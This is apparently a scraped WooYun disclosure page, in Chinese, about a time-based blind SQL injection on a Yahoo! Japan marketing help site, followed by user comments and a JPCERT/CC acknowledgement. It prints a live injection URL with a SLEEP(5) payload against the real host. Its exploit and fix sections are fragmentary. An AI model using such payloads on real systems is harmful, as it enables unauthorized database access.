漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:Yahoo! Japan Website Time-based Blind SQL Injection Vulnerabilities
提交时间:2016-02-16 23:51
修复时间:2016-02-22 09:00
公开时间:2016-02-22 09:00
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(日本国家互联网应急中心(JPCERT/CC))处理
Tags标签:
无
漏洞详情 披露状态:
2016-02-16: 细节已通知厂商并且等待厂商处理中
简要描述: Yahoo! Japan Website Time-based Blind SQL Injection Vulnerabilities
详细说明: #1 DESCRIPTION
https://help.marketing.yahoo.co.jp/ja/?cat=5) AND (SELECT * FROM (SELECT(SLEEP(5)))ring) AND (1=1&s=123
漏洞证明: #3 EXPLOIT
#!/usr/bin/env python
wordpresj@**.**.**.**
修复方案: # before making any kind of request with them must be validated.
版权声明:转载请注明来源 猪猪侠 @乌云
漏洞回应 厂商回应: 危害等级:无影响厂商忽略
忽略时间:2016-02-22 09:00
厂商回复:
漏洞Rank:15 (WooYun评价)
最新状态: 暂无
漏洞评价:
评价
2016-02-16 23:53 |
小龙 ( 普通白帽子 | Rank:1446 漏洞数:366 | 乌云有着这么一群人,在乌云学技术,去某数...)
2016-02-16 23:57 |
从容 ( 普通白帽子 | Rank:252 漏洞数:80 | Enjoy Hacking Just Because It's Fun :) ...)
JPCERT有懂中文的,这惊出第三方语言。2333
2016-02-17 00:01 |
404notfound ( 普通白帽子 | Rank:227 漏洞数:65 | 天朝教育网杀神)
2016-02-17 00:01 |
白无常 ( 实习白帽子 | Rank:77 漏洞数:10 )
2016-02-17 00:06 |
ba1ma0 ( 路人 | Rank:10 漏洞数:4 | 什么都不会..)
2016-02-17 00:11 |
f4ck ( 实习白帽子 | Rank:42 漏洞数:7 | 有些人很牛B,一个漏洞能刷成N个。)
2016-02-17 00:14 |
hecate ( 普通白帽子 | Rank:743 漏洞数:113 | ®高级安全工程师 | WooYun认证√)
2016-02-17 00:22 |
87技术联盟-Jack ( 路人 | Rank:2 漏洞数:1 | 来自于浩瀚网络中的小白!)
2016-02-17 00:33 |
大物期末不能挂 ( 普通白帽子 | Rank:132 漏洞数:23 | 1.一个学渣,只求每门都不挂2.想把漏洞提...)
2016-02-17 00:39 |
大物期末不能挂 ( 普通白帽子 | Rank:132 漏洞数:23 | 1.一个学渣,只求每门都不挂2.想把漏洞提...)
2016-02-17 00:44 |
荒废的腰子 ( 普通白帽子 | Rank:113 漏洞数:14 | 以前的马甲不用了~~~)
2016-02-17 00:57 |
zeracker ( 普通白帽子 | Rank:1077 漏洞数:139 | 多乌云、多机会!微信公众号: id:a301zls ...)
2016-02-17 08:18 |
暴走 ( 普通白帽子 | Rank:469 漏洞数:90 | Wooyun的Rank获取如同Dota冲天梯有过之而无...)
2016-02-17 08:37 |
Gowabby ( 路人 | Rank:6 漏洞数:3 | 小白一个,求各位大大带我成为大神。)
2016-02-17 08:44 |
gainover ( 核心白帽子 | Rank:1805 漏洞数:97 | PKAV技术宅社区! -- gainover| 工具猫网络-...)
2016-02-17 08:47 |
龙腾风云 ( 路人 | Rank:12 漏洞数:5 | IT老江湖,安全小菜鸟。)
2016-02-17 09:00 |
Format_smile ( 普通白帽子 | Rank:330 漏洞数:122 | ···孰能无过,谁是谁非!)
2016-02-17 09:10 |
asd ( 路人 | Rank:2 漏洞数:1 | asdasdasdasdasdasdasdasdasdasdasdasdasda...)
2016-02-17 09:24 |
SH0X8001 ( 路人 | Rank:15 漏洞数:3 | 你猜)
2016-02-17 09:25 |
岛云首席鉴黄师 ( 普通白帽子 | Rank:445 漏洞数:125 | icisaw.cn 超低价虚拟主机VPS 购买返现 支...)
2016-02-17 09:35 |
土夫子 ( 普通白帽子 | Rank:434 漏洞数:77 | 渗透白帽招生,一对一培训,有意私聊)
2016-02-17 10:09 |
secart ( 路人 | Rank:27 漏洞数:5 | 这个人很懒,什么都没留。)
2016-02-17 10:22 |
Can ( 实习白帽子 | Rank:73 漏洞数:22 | 天地不仁 以万物为刍狗)
2016-02-17 12:23 |
随风的风 ( 普通白帽子 | Rank:207 漏洞数:72 | 微信公众号:233sec 不定期分享各种漏洞思...)
2016-02-17 17:34 |
龙腾风云 ( 路人 | Rank:12 漏洞数:5 | IT老江湖,安全小菜鸟。)
难道国外就这么好搞?!猪哥这是不是在指点我们一条发财的路
Dear 猪猪侠This is JPCERT/CC.Thank you for your information. (WooYun-2016-176307, WooYun-2016-176307, WooYun-2016-176383)We notified this information to YAHOO!JAPAN (Yahoo Incident Response Division)
2016-02-18 17:20 |
SH0X8001 ( 路人 | Rank:15 漏洞数:3 | 你猜)
@日本国家互联网应急中心(JPCERT/CC) 真JPCERT 0.0
2016-02-21 15:16 |
老笨蛋 ( 路人 | Rank:29 漏洞数:8 | 老笨蛋一个)
( 普通白帽子 | Rank:1077 漏洞数:139 | 多乌云、多机会!微信公众号: id:a301zls ...)